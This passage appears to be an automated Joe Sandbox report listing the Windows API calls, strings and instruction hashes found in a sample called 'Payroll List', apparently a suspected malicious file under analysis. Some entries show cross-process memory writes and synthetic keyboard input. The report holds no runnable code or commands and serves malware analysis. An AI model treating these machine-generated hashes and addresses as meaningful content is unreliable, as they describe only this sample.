                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                    • String ID: .lnk
                                                                    • API String ID: 2126378814-24824748
                                                                    APIs
                                                                    • __startOneArgErrorHandling.LIBCMT ref: 001432ED
                                                                      • Part of subcall function 0014E0D0: __87except.LIBCMT ref: 0014E10B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorHandling__87except__start
                                                                    • String ID: pow
                                                                    • API String ID: 2905807303-2276729525
                                                                    • Opcode ID: 814fc57a9bf83d5ab5afefde90c4f9d6906be4b61d56b95cc3b6384127586795
                                                                    • Instruction ID: 433b731feb845abd8a63df1dca24426fb8ba8c9d5d3799f78f33e0433de2fea8
                                                                    • Opcode Fuzzy Hash: 814fc57a9bf83d5ab5afefde90c4f9d6906be4b61d56b95cc3b6384127586795
                                                                    • Instruction Fuzzy Hash: 00515A31A0820296CB15BB14C94177E7BD4BB50B20F348E28F4E6822F9DFB48DD8DA42
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,001BDC50,?,0000000F,0000000C,00000016,001BDC50,?), ref: 00164645
                                                                      • Part of subcall function 0012936C: __swprintf.LIBCMT ref: 001293AB
                                                                      • Part of subcall function 0012936C: __itow.LIBCMT ref: 001293DF
                                                                    • CharUpperBuffW.USER32(?,?,00000000,?), ref: 001646C5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper$__itow__swprintf
                                                                    • String ID: REMOVE$THIS
                                                                    • API String ID: 3797816924-776492005
                                                                    • Opcode ID: 336ec13594a6e24849482d7cb1f8d0a5a9f7e2c658a151129db7c5bfbdc310a8
                                                                    • Instruction ID: 4c612716c5b36d9645d38760513fd32e1e493b775119e482deb99a98363fbef1
                                                                    • Opcode Fuzzy Hash: 336ec13594a6e24849482d7cb1f8d0a5a9f7e2c658a151129db7c5bfbdc310a8
                                                                    • Instruction Fuzzy Hash: 9641A134A002199FCF04EFA4DC81AAEB7B5FF59304F148069E916AB3A2DB30DD65CB50
                                                                    APIs
                                                                      • Part of subcall function 0016430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0015BC08,?,?,00000034,00000800,?,00000034), ref: 00164335
                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0015C1D3
                                                                      • Part of subcall function 001642D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0015BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00164300
                                                                      • Part of subcall function 0016422F: GetWindowThreadProcessId.USER32(?,?), ref: 0016425A
                                                                      • Part of subcall function 0016422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0015BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0016426A
                                                                      • Part of subcall function 0016422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0015BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00164280
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0015C240
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0015C28D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                    • String ID: @
                                                                    • API String ID: 4150878124-2766056989
                                                                    • Opcode ID: 4ea56f7881f197294ad674ae448df04cf286a8f4e550147548b46ed9b4425f46
                                                                    • Instruction ID: 917f19b83a4a04693c21c4c683f7abe3d1a3c6895c85eda2849c1997f47a39d9
                                                                    • Opcode Fuzzy Hash: 4ea56f7881f197294ad674ae448df04cf286a8f4e550147548b46ed9b4425f46
                                                                    • Instruction Fuzzy Hash: 4E413C76900218BFDB10DFA4DC81AEEB778BF19700F104099FA55BB181DB716E99CBA1
                                                                    APIs
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,001BDC00,00000000,?,?,?,?), ref: 0018A6D8
                                                                    • GetWindowLongW.USER32 ref: 0018A6F5
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0018A705
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long
                                                                    • String ID: SysTreeView32
                                                                    • API String ID: 847901565-1698111956
                                                                    • Opcode ID: 0fc356a1da8ced22064a0ed2a3dbedfe1dc12a231b60444136139222cf19a3a7
                                                                    • Instruction ID: 61cfc9090b487b56b7bd76fbe5b029c34c4313ae96217efe343a7a83a89e66c9
                                                                    • Opcode Fuzzy Hash: 0fc356a1da8ced22064a0ed2a3dbedfe1dc12a231b60444136139222cf19a3a7
                                                                    • Instruction Fuzzy Hash: 1031CF71200606AFEB119F38DC81BEA7BA9FF49324F244726F975932E0D771AD509B50
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0018A15E
                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0018A172
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 0018A196
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window
                                                                    • String ID: SysMonthCal32
                                                                    • API String ID: 2326795674-1439706946
                                                                    • Opcode ID: a951d94efef2c3c6c2c7c9bad49780d7cbf6cce7c1c6b1397b83d7f6cf0977b3
                                                                    • Instruction ID: 1da70b04f53b2615071c017dce74c6534fb224251c5c4a48d1c30abbd7a44c08
                                                                    • Opcode Fuzzy Hash: a951d94efef2c3c6c2c7c9bad49780d7cbf6cce7c1c6b1397b83d7f6cf0977b3
                                                                    • Instruction Fuzzy Hash: 3021A132510218BBEF159F94CC86FEA3BBAEF48714F110215FA556B1D0D7B5AC51CB90
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0018A941
                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0018A94F
                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0018A956
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$DestroyWindow
                                                                    • String ID: msctls_updown32
                                                                    • API String ID: 4014797782-2298589950
                                                                    • Opcode ID: 67841e2dae34401809fb5d430d2f2f1efc257cda92bb5118decef34d90441651
                                                                    • Instruction ID: 8877b55dd330721de90e13565756c941e22e89b7273724d9527279858368d7fe
                                                                    • Opcode Fuzzy Hash: 67841e2dae34401809fb5d430d2f2f1efc257cda92bb5118decef34d90441651
                                                                    • Instruction Fuzzy Hash: DB21B2B5600209BFEB00EF58DCC1DAB37ADEF5A358B45005AFA049B261CB70EC51CB61
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00189A30
                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00189A40
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00189A65
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$MoveWindow
                                                                    • String ID: Listbox
                                                                    • API String ID: 3315199576-2633736733
                                                                    • Opcode ID: f834b2fa423c9748c8268e46ff2183be9ac9114c3bba879cab7eb212945d4d6e
                                                                    • Instruction ID: f1ddf04de76df091a54da4889151b82b73155daf238f1ee6af126994e1fe364d
                                                                    • Opcode Fuzzy Hash: f834b2fa423c9748c8268e46ff2183be9ac9114c3bba879cab7eb212945d4d6e
                                                                    • Instruction Fuzzy Hash: 3521F232600118BFDF259F54DC85EBF3BAAEF89764F058128F9459B190C7719C518BA0
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0018A46D
                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0018A482
                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0018A48F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: msctls_trackbar32
                                                                    • API String ID: 3850602802-1010561917
                                                                    • Opcode ID: 0d7213e711c61a2764940bb8830057c6574c45cd8ca64898216d30dafb2cff80
                                                                    • Instruction ID: 4618d638bab4c3d4e1a0468877835741305c7a517715790d1c6c7702fc68756c
                                                                    • Opcode Fuzzy Hash: 0d7213e711c61a2764940bb8830057c6574c45cd8ca64898216d30dafb2cff80
                                                                    • Instruction Fuzzy Hash: C2110A71200208BFEF246F64CC45FAB3769EF89754F064119FA4596091D3B1E811CB20
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00142350,?), ref: 001422A1
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 001422A8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: RoInitialize$combase.dll
                                                                    • API String ID: 2574300362-340411864
                                                                    • Opcode ID: 5293afc42d2fc2add3219070633c2edf3911dbdf5409ce2847e15a72559c943c
                                                                    • Instruction ID: 8915005695638b4aa57aa48e9df936cda168b42160bc3226f93248f96680719e
                                                                    • Opcode Fuzzy Hash: 5293afc42d2fc2add3219070633c2edf3911dbdf5409ce2847e15a72559c943c
                                                                    • Instruction Fuzzy Hash: 13E01A74691750ABDB115FB0EC89B193B64AB09702F404020F102DE8F0DBF884C0CF08
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00142276), ref: 00142376
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0014237D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: RoUninitialize$combase.dll
                                                                    • API String ID: 2574300362-2819208100
                                                                    • Opcode ID: 6a2094838726b8c4a8dfdca63b3602e9b306f6be4b6934feecdecaa8d58fa574
                                                                    • Instruction ID: 7484cc3182ab838b0dc59da985ea477251eeef384891581e7078262eb4440814
                                                                    • Opcode Fuzzy Hash: 6a2094838726b8c4a8dfdca63b3602e9b306f6be4b6934feecdecaa8d58fa574
                                                                    • Instruction Fuzzy Hash: F9E0B674686740ABDB229FA0FD4DB083A65BB09702F520455F10ADACB0CBF898C0CA14
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: LocalTime__swprintf
                                                                    • String ID: %.3d$WIN_XPe
                                                                    • API String ID: 2070861257-2409531811
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,001821FB,?,001823EF), ref: 00182213
                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00182225
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: GetProcessId$kernel32.dll
                                                                    • API String ID: 2574300362-399901964
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,001242EC,?,001242AA,?), ref: 00124304
                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00124316
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                    • API String ID: 2574300362-1355242751
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,001241BB,00124341,?,0012422F,?,001241BB,?,?,?,?,001239FE,?,00000001), ref: 00124359
                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0012436B
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                    • API String ID: 2574300362-3689287502
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(oleaut32.dll,?,0016051D,?,001605FE), ref: 00160547
                                                                    • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00160559
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                    • API String ID: 2574300362-1071820185
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0016052F,?,001606D7), ref: 00160572
                                                                    • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00160584
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                    • API String ID: 2574300362-1587604923
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0017ECBE,?,0017EBBB), ref: 0017ECD6
                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0017ECE8
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                    • API String ID: 2574300362-1816364905
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0017BAD3,00000001,0017B6EE,?,001BDC00), ref: 0017BAEB
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0017BAFD
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                    • API String ID: 2574300362-199464113
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00183BD1,?,00183E06), ref: 00183BE9
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00183BFB
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                    • API String ID: 2574300362-4033151799
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 0017AAB4
                                                                    • CoUninitialize.OLE32 ref: 0017AABF
                                                                      • Part of subcall function 00160213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0016027B
                                                                    • VariantInit.OLEAUT32(?), ref: 0017AACA
                                                                    • VariantClear.OLEAUT32(?), ref: 0017AD9D
                                                                    Similarity
                                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                    • String ID:
                                                                    • API String ID: 780911581-0
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                    • String ID:
                                                                    • API String ID: 2808897238-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                    • String ID:
                                                                    • API String ID: 3877424927-0
                                                                    • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                    • Instruction ID: 395d9cdbad43f8cf73eafa58a906889672f743256acfa7862996559d6361e290
                                                                    • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                    • Instruction Fuzzy Hash: 5A51A7B0A00206ABDB289FA988856AE77B1AF50330F258729F875962F0D7719F519F50
                                                                    APIs
                                                                    • GetWindowRect.USER32(00D35B08,?), ref: 0018C544
                                                                    • ScreenToClient.USER32(?,00000002), ref: 0018C574
                                                                    • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0018C5DA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientMoveRectScreen
                                                                    • String ID:
                                                                    • API String ID: 3880355969-0
                                                                    • Opcode ID: 20b5bf78d5ff48797fae8b8460f11e5646f9a79c89ad9dbb02ef146ae1939e1e
                                                                    • Instruction ID: b7fe339349ee6dad173a76787eb772ccb5f7601993f155582ea566462a59a7be
                                                                    • Opcode Fuzzy Hash: 20b5bf78d5ff48797fae8b8460f11e5646f9a79c89ad9dbb02ef146ae1939e1e
                                                                    • Instruction Fuzzy Hash: BA513F75A00605EFCF10EF68D8809AE77B6EF55320F248669F9559B290D770EE81CFA0
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0015C462
                                                                    • __itow.LIBCMT ref: 0015C49C
                                                                      • Part of subcall function 0015C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0015C753
                                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0015C505
                                                                    • __itow.LIBCMT ref: 0015C55A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$__itow
                                                                    • String ID:
                                                                    • API String ID: 3379773720-0
                                                                    • Opcode ID: 50523f3f97a06497fd845b3dc4b5720db05fa1993626b5e89bd52a5af672d924
                                                                    • Instruction ID: b95ae9abb241bfef7031d4d593e962fb244532c5e83bf08cb9dcc4849bda6cf2
                                                                    • Opcode Fuzzy Hash: 50523f3f97a06497fd845b3dc4b5720db05fa1993626b5e89bd52a5af672d924
                                                                    • Instruction Fuzzy Hash: B241E331A00318AFDF21DF54D845FEE7BB9AF59701F000019FE15AB281DB709A59CBA1
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00163966
                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00163982
                                                                    • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 001639EF
                                                                    • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00163A4D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                    • String ID:
                                                                    • API String ID: 432972143-0
                                                                    • Opcode ID: 81ce5ebe6ab9f8dcb932ea5d829be5822cc13b13dcf6f8a06fb3b3c6b7dc218d
                                                                    • Instruction ID: 56dbae8dedf3974b53cb922b585000c0483090cae36015a211f5d3c64f823ea8
